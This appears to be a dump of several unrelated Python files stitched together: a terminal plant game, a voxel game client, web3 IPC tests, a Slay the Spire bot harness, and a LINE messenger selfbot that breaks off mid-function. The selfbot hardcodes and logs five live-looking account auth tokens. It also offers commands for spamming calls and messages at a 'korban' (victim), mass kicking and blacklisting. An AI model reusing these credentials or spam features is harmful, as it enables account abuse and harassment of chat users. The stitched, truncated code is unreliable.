guest_json = home_folder + "/{}/.botany/{}_plant_data.json".format(guest_garden, guest_garden)
guest_plant_description = ""
if os.path.isfile(guest_json):
with open(guest_json) as f:
visitor_data = json.load(f)
guest_plant_description = visitor_data['description']
self.visited_plant = self.get_visited_plant(visitor_data)
guest_visitor_file = home_folder + "/{}/.botany/visitors.json".format(guest_garden, guest_garden)
if os.path.isfile(guest_visitor_file):
water_success = self.water_on_visit(guest_visitor_file)
if water_success:
self.screen.addstr(16, 2, "...you watered ~{}'s {}...".format(str(guest_garden), guest_plant_description))
if self.visited_plant:
self.draw_plant_ascii(self.visited_plant)
else:
self.screen.addstr(16, 2, "{}'s garden is locked, but you can see in...".format(guest_garden))
else:
self.screen.addstr(16, 2, "i can't seem to find directions to {}...".format(guest_garden))
try:
self.screen.getch()
self.clear_info_pane()
self.draw_plant_ascii(self.plant)
finally:
self.visited_plant = None
def water_on_visit(self, guest_visitor_file):
visitor_data = {}
# using -1 here so that old running instances can be watered
guest_data = {'user': getpass.getuser(), 'timestamp': int(time.time()) - 1}
if os.path.isfile(guest_visitor_file):
if not os.access(guest_visitor_file, os.W_OK):
return False
with open(guest_visitor_file) as f:
visitor_data = json.load(f)
visitor_data.append(guest_data)
with open(guest_visitor_file, mode='w') as f:
f.write(json.dumps(visitor_data, indent=2))
return True
def get_visited_plant(self, visitor_data):
""" Returns a drawable pseudo plant object from json data """
class VisitedPlant: pass
plant = VisitedPlant()
plant.stage = 0
plant.species = 0
if "is_dead" not in visitor_data:
return None
plant.dead = visitor_data["is_dead"]
if plant.dead:
return plant
if "stage" in visitor_data:
stage = visitor_data["stage"]
if stage in self.plant.stage_list:
plant.stage = self.plant.stage_list.index(stage)
if "species" in visitor_data:
species = visitor_data["species"]
if species in self.plant.species_list:
plant.species = self.plant.species_list.index(species)
else:
return None
elif plant.stage > 1:
return None
return plant
def handle_request(self, request):
# Menu options call functions here
if request == None: return
if request == "harvest":
self.harvest_confirmation()
if request == "water":
self.plant.water()
if request == "look":
try:
self.draw_plant_description(self.plant)
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "instructions":
try:
self.draw_instructions()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "visit":
try:
self.visit_handler()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
if request == "garden":
try:
self.draw_garden()
except Exception as exception:
self.screen.refresh()
# traceback.print_exc()
def __exit__(self):
self.exit = True
cleanup()
def cleanup():
try:
curses.curs_set(2)
except curses.error:
# cursor not supported; just ignore
pass
curses.endwin()
os.system('clear')
|
core.py
|
from ursina import *
from ursina.prefabs.first_person_controller import FirstPersonController
import threading, random
import esp, client as clientlib
# $Connection portal
IP = "192.168.100.245"
RECV_HEADER = 1024
# Recv thread controls
global recv_thread_status
recv_thread_status = True
global latest_recv_message
latest_recv_message = ""
client = clientlib.app(IP, 80, "|")
client.connect()
app = Ursina()
class Voxel(Button):
def __init__(self, position=(0, 0, 0)):
super().__init__(
parent=scene,
position=position,
model="cube",
origin_y=0.5,
texture="white_cube",
color=color.rgb(0, random.randrange(200, 240), 8),
highlight_color=color.lime,
)
def input(self, key):
if self.hovered:
if key == "left mouse down":
new_block_pos = self.position + mouse.normal
client.send(
f"CREATE-BLOCK {str(int(new_block_pos.x))} {str(int(new_block_pos.y))} {str(int(new_block_pos.z))} "
)
# voxel = Voxel(position=new_block_pos)
if key == "right mouse down":
destroy(self)
def constant_recv():
while recv_thread_status:
print("Thread still running!")
latest_recv_message = str(client.recv(RECV_HEADER).decode("utf-8"))
print(latest_recv_message)
if latest_recv_message.startswith("CREATE-BLOCK "):
print(latest_recv_message[len("CREATE-BLOCK ") :])
new_voxel_pos = latest_recv_message[len("CREATE-BLOCK ") :].split(" ")
print(new_voxel_pos)
print(new_voxel_pos[0], new_voxel_pos[1], new_voxel_pos[2])
new_voxel = Voxel(
position=(
int(new_voxel_pos[0]),
int(new_voxel_pos[1]),
int(new_voxel_pos[2]),
)
)
print(
f"[RECV-FROM-SERVER]: added new block at {latest_recv_message[len('CREATE-BLOCK '):]}"
)
constant_recv_thread = threading.Thread(target=constant_recv)
constant_recv_thread.start()
def input(key):
if key == "q":
recv_thread_status = False
client.close()
app.closeWindow()
for z in range(8):
for x in range(8):
voxel = Voxel(position=(x, 0, z))
player = FirstPersonController()
app.run()
|
test_ipc_provider.py
|
import os
import pathlib
import pytest
import socket
import tempfile
from threading import (
Thread,
)
import time
import uuid
from web3.auto.gethdev import (
w3,
)
from web3.middleware import (
construct_fixture_middleware,
)
from web3.providers.ipc import (
IPCProvider,
)
@pytest.fixture
def jsonrpc_ipc_pipe_path():
with tempfile.TemporaryDirectory() as temp_dir:
ipc_path = os.path.join(temp_dir, f'{uuid.uuid4()}.ipc')
try:
yield ipc_path
finally:
if os.path.exists(ipc_path):
os.remove(ipc_path)
def test_ipc_no_path():
"""
IPCProvider.isConnected() returns False when no path is supplied
"""
ipc = IPCProvider(None)
assert ipc.isConnected() is False
def test_ipc_tilda_in_path():
expectedPath = str(pathlib.Path.home()) + '/foo'
assert IPCProvider('~/foo').ipc_path == expectedPath
assert IPCProvider(pathlib.Path('~/foo')).ipc_path == expectedPath
@pytest.fixture
def simple_ipc_server(jsonrpc_ipc_pipe_path):
serv = socket.socket(socket.AF_UNIX)
serv.bind(jsonrpc_ipc_pipe_path)
serv.listen(1)
try:
yield serv
finally:
serv.close()
@pytest.fixture
def serve_empty_result(simple_ipc_server):
def reply():
connection, client_address = simple_ipc_server.accept()
try:
connection.recv(1024)
connection.sendall(b'{"id":1, "result": {}')
time.sleep(0.1)
connection.sendall(b'}')
finally:
# Clean up the connection
connection.close()
simple_ipc_server.close()
thd = Thread(target=reply, daemon=True)
thd.start()
try:
yield
finally:
thd.join()
def test_sync_waits_for_full_result(jsonrpc_ipc_pipe_path, serve_empty_result):
provider = IPCProvider(pathlib.Path(jsonrpc_ipc_pipe_path), timeout=3)
result = provider.make_request("method", [])
assert result == {'id': 1, 'result': {}}
provider._socket.sock.close()
def test_web3_auto_gethdev():
assert isinstance(w3.provider, IPCProvider)
return_block_with_long_extra_data = construct_fixture_middleware({
'eth_getBlockByNumber': {'extraData': '0x' + 'ff' * 33},
})
w3.middleware_onion.inject(return_block_with_long_extra_data, layer=0)
block = w3.eth.get_block('latest')
assert 'extraData' not in block
assert block.proofOfAuthorityData == b'\xff' * 33
|
main.py
|
import sys
import queue
import threading
import json
import collections
import time
import logging
logging.basicConfig(level=logging.DEBUG, filename='/Users/tmssmith/StS_AI/AI_test/log.log')
def read_stdin(input_queue):
"""Read lines from stdin and write them to a queue
:param input_queue: A queue, to which lines from stdin will be written
:type input_queue: queue.Queue
:return: None
"""
while True:
stdin_input = ""
while True:
input_char = sys.stdin.read(1)
if input_char == '\n':
break
else:
stdin_input += input_char
input_queue.put(stdin_input)
def write_stdout(output_queue):
"""Read lines from a queue and write them to stdout
:param output_queue: A queue, from which this function will receive lines of text
:type output_queue: queue.Queue
:return: None
"""
while True:
output = output_queue.get()
logging.debug('Write: {}'.format(output))
print(output, end='\n', flush=True)
class Coordinator:
"""An object to coordinate communication with Slay the Spire"""
def __init__(self):
self.input_queue = queue.Queue()
self.output_queue = queue.Queue()
self.input_thread = threading.Thread(target=read_stdin, args=(self.input_queue,))
self.output_thread = threading.Thread(target=write_stdout, args=(self.output_queue,))
self.input_thread.daemon = True
self.input_thread.start()
self.output_thread.daemon = True
self.output_thread.start()
self.action_queue = collections.deque()
self.state_change_callback = None
self.out_of_game_callback = None
self.error_callback = None
self.game_is_ready = False
self.stop_after_run = False
self.in_game = False
self.last_game_state = None
self.last_error = None
def signal_ready(self):
"""Indicate to Communication Mod that setup is complete
Must be used once, before any other commands can be sent.
:return: None
"""
# print('signal ready')
self.send_message("ready")
def send_message(self, message):
"""Send a command to Communication Mod and start waiting for a response
:param message: the message to send
:type message: str
:return: None
"""
self.output_queue.put(message)
self.game_is_ready = False
def get_next_raw_message(self, block=False):
"""Get the next message from Communication Mod as a string
:param block: set to True to wait for the next message
:type block: bool
:return: the message from Communication Mod
:rtype: str
"""
if block or not self.input_queue.empty():
return self.input_queue.get()
coordinator = Coordinator()
coordinator.signal_ready()
while True:
message = coordinator.get_next_raw_message(False)
if message is not None:
logging.debug('Read: {}'.format(message))
|
Ts.py
|
import BONDS
from BONDS import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
from googletrans import Translator
import youtube_dl
#ANTIJS_V2
#cl = LineClient()
cl = LineClient(authToken='EymhbepN62xaDhMQLfM8.h0dLm9gzqKE1Oaznh1hgAa.cocrfOGN7URnCRvJ5ZnA4sWr40p+yISKiHticmPYpks=')
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
#ki = LineClient()
ki = LineClient(authToken='Ey3Vz2obFmqvVX2xRIp9.nuUU5kRRG+fC3Z9YVNv7Qq.40qkn3p0xm6O/u8xbQBYutJVGj0UlbePwU9fk0vzBro=')
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
#kk = LineClient()
kk = LineClient(authToken='EyrwkRraUDS5hzuuLpl2.buJLD7JrrngDnMf5qDfqyG.34qAnJQZDGnM84k2v+yuHYzLWva/nCxqY25chvjSiuI=')
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
#kc = LineClient()
kc = LineClient(authToken='EyA71IJPTno5dqWNQsCf.9eQsWmyR4F9AFNPZDyQTtW.Vape/NVypwUnT7am1EiDPef9ZGs4LkNIM6HCbU7VThA=')
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
#sw = LineClient()
sw = LineClient(authToken='EyrSPsIqPmpphh5j5rW3.TrVjFf5pyd8D+ZxPusvq0W./HG61gK46XwunolGSUq545YSdnBXBX+4vOCydOcGqRo=')
sw.log("Auth Token : " + str(sw.authToken))
channel11 = LineChannel(sw)
sw.log("Channel Access Token : " + str(channel11.channelAccessToken))
poll = LinePoll(cl)
call = cl
creator = ["u1f40e533d1994247b5a0064d1f51c668"]
owner = ["u1f40e533d1994247b5a0064d1f51c668"]
admin = ["u1f40e533d1994247b5a0064d1f51c668"]
staff = ["u1f40e533d1994247b5a0064d1f51c668"]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Zmid = sw.getProfile().mid
KAC = [cl]
ABC = [sw]
Bots = [mid,Zmid]
Dpk = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
welcome = []
responsename1 = cl.getProfile().displayName
responsename2 = cl.getProfile().displayName
responsename3 = cl.getProfile().displayName
settings = {
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"autoJoinTicket":False,
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 1,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":True,
"contact":False,
'autoJoin':True,
'autoAdd':True,
'autoRead':False,
'autoLeave':False,
'autoLeave1':False,
"detectMention":True,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"selfbot":True,
"mention":"SINI KAK GABUNG NAPA NGINTIP BAE 😊",
"Respontag":"Woy Tag Bae Gak Punya Kerjaan Lo Yaa",
"welcome":"Selamat datang & semoga betah",
"comment":"Like like & like by ghovin87",
"message":"Terimakasih sudah add saya 😃",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "Total Sider User「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "Total Member Masuk「{}」\nHaii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n⏩ Group : "+str(len(gid))+"\n⏩ Teman : "+str(len(teman))+"\n⏩ Expired : In "+hari+"\n⏩ Version : ANTIJS2\n⏩ Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n⏩ Runtime : \n • "+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "❧MENU HELP❧\n" + \
"π" "Me\n" + \
"π" "Mid「@」\n" + \
"π" "Info「@」\n" + \
"π" "Nk「@」\n" + \
"π" "Kick1「@」\n" + \
"π" "Mybot\n" + \
"π" "Status\n" + \
"π" "About\n" + \
"π" "Restart\n" + \
"π" "Runtime\n" + \
"π" "Creator\n" + \
"π" "Speed/Sp\n" + \
"π" "Sprespon\n" + \
"π" "Tagall\n" + \
"π" "Joinall\n" + \
"π" "Byeall\n" + \
"π" "Byeme\n" + \
"π" "Leave「Namagrup」\n" + \
"π" "Ginfo\n" + \
"π" "Open\n" + \
"π" "Close\n" + \
"π" "Url grup\n" + \
"π" "Gruplist\n" + \
"π" "Infogrup「angka」\n" + \
"π" "Infomem「angka」\n" + \
"π" "Remove chat\n" + \
"π" "Lurking「on/off」\n" + \
"π" "Lurkers\n" + \
"π" "Sider「on/off」\n" + \
"π" "Updatefoto\n" + \
"π" "Updategrup\n" + \
"π" "Updatebot\n" + \
"π" "Broadcast:「Text」\n" + \
"π" "Setkey「New Key」\n" + \
"π" "Mykey\n" + \
"π" "Resetkey\n" + \
"π" "ID line:「Id Line nya」\n" + \
"π" "Sholat:「Nama Kota」\n" + \
"π" "Cuaca:「Nama Kota」\n" + \
"π" "Lokasi:「Nama Kota」\n" + \
"π" "Music:「Judul Lagu」\n" + \
"π" "Lirik:「Judul Lagu」\n" + \
"π" "Ytmp3:「Judul Lagu」\n" + \
"π" "Ytmp4:「Judul Video」\n" + \
"π" "Profileig:「Nama IG」\n" + \
"π" "Cekdate:「tgl-bln-thn」\n" + \
"π" "Jumlah:「angka」\n" + \
"π" "Spamtag「@」\n" + \
"π" "Spamcall:「jumlahnya」\n" + \
"π" "Spamcall\n" + \
"π" "Notag「on/off」\n" + \
"π" "Allpro「on/off」\n" + \
"π" "Protecturl「on/off」\n" + \
"π" "Protectjoin「on/off」\n" + \
"π" "Protectkick「on/off」\n" + \
"π" "Protectcancel「on/off」\n" + \
"π" "Antijs「on/off」\n" + \
"π" "Antijs stay\n" + \
"π" "Ghost「on/off」\n" + \
"π" "Sticker「on/off」\n" + \
"π" "Respon「on/off」\n" + \
"π" "Contact「on/off」\n" + \
"π" "Autojoin「on/off」\n" + \
"π" "Autoadd「on/off」\n" + \
"π" "Welcome「on/off」\n" + \
"π" "Autoleave「on/off」\n" + \
"π" "Admin:on\n" + \
"π" "Admin:repeat\n" + \
"π" "Staff:on\n" + \
"π" "Staff:repeat\n" + \
"π" "Bot:on\n" + \
"π" "Bot:repeat\n" + \
"π" "Adminadd「@」\n" + \
"π" "Admindell「@」\n" + \
"π" "Staffadd「@」\n" + \
"π" "Staffdell「@」\n" + \
"π" "Botadd「@」\n" + \
"π" "Botdell「@」\n" + \
"π" "Refresh\n" + \
"π" "Listbot\n" + \
"π" "Listadmin\n" + \
"π" "Listprotect\n" + \
"♠Yang Betul Nulis Nya♠"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "♣HELP BOT♣\n" + \
"°" "Blc\n" + \
"°" "Ban:on\n" + \
"°" "Unban:on\n" + \
"°" "Ban「@」\n" + \
"°" "Unban「@」\n" + \
"°" "Talkban「@」\n" + \
"°" "Untalkban「@」\n" + \
"°" "Talkban:on\n" + \
"°" "Untalkban:on\n" + \
"°" "Banlist\n" + \
"°" "Talkbanlist\n" + \
"°" "Clearban\n" + \
"°" "Refresh\n" + \
"°" "Cek sider\n" + \
"°" "Cek spam\n" + \
"°" "Cek pesan \n" + \
"°" "Cek respon \n" + \
"°" "Cek welcome\n" + \
"°" "Set sider:「Text」\n" + \
"°" "Set spam:「Text」\n" + \
"°" "Set pesan:「Text」\n" + \
"°" "Set respon:「Text」\n" + \
"°" "Set welcome:「Text」\n" + \
"°" "Myname:「Nama」\n" + \
"°" "Bot1name:「Nama」\n" + \
"°" "Bot2name:「Nama」\n" + \
"°" "Bot3name:「Nama」\n" + \
"°" "Bot1up「Kirim fotonya」\n" + \
"°" "Bot2up「Kirim fotonya」\n" + \
"°" "Bot3up「Kirim fotonya」\n" + \
"°" "Gift:「Mid korban」「Jumlah」\n" + \
"°" "Spam:「Mid korban」「Jumlah」\n" + \
"°♦ANTI JS V-2♦°"
return helpMessage1
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
kk.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
kc.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " +str(ginfo.name))
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " + str(ginfo.name))
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = ki.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kk.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kk.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kc.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kc.cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendText(op.param1, wait["message"])
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
try:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.updateGroup(G)
